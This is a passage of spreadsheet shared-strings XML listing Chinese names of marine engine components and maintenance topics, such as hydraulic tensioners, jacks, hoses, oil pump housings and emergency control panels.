  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压工具，端垫螺栓</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>铁垫</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压工具附件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>数据</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮盘</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压工具维护</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压供应元件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压管</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压管密封工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压管液压拉伸器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压管总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压环</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压环，数据</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压活塞工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压加长接头</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压控制油系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压控制元件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压控制装置块排污孔</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压拉伸螺母</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压拉伸配置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压拉伸器（液压缸）</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压拉伸器备件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压拉伸器附件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压拉伸器内螺母</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压拉伸器外螺母</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压拉伸设备</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压拉伸系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压力矩补偿器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压联轴器部件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压螺母</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>数据</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压滤器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压马达起重工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压排气促动器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压膨胀螺栓</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压千斤顶</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压千斤顶，燃油泵</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压千斤顶颈向轴承</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压千斤顶联轴器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压千斤顶</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲轴</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压千斤顶轴向减振器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压软管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压软管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>低压</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压软管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>高压</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压上紧工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压手泵</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压伺服系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压系统部件</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压系统部件</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压汽缸</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压系统说明</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压蓄压器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压蓄压器首次认可</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压油泵</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压油冲洗</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压油管</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压油管出口管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压油管进口管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压油进</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>出口，低压</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压油滤器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压油取样生产建议</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压支撑设备</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压柱塞吊装工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压组件</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>+</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>注油器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>一般布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>一般指示表</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>仪表板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>仪表板托架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>仪表布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>仪表支架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>仪表座</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>以太网开关</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>异径</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>(</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>)</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>接头</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>意大利语说明板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>溢流阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>银石墨电刷</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>英文说明板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>荧光灯</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>荧光灯管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>荧光照明器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>影响气缸磨损的因素</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>应变计测量</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>应急操纵电气箱</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>应急操纵台安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>应急操纵台电气箱安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>应急操作</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>应急电池铭牌</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>应急工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>应急工具板总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>应急鼓风机布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>应急控制工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>应急运行铭牌</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>硬白合金层</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油泵的安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油泵垫片</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油泵更换</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油泵壳盖</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油泵壳体</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油泵壳体后部</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油泵壳体上部</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油泵壳体下部</t>
    </r>
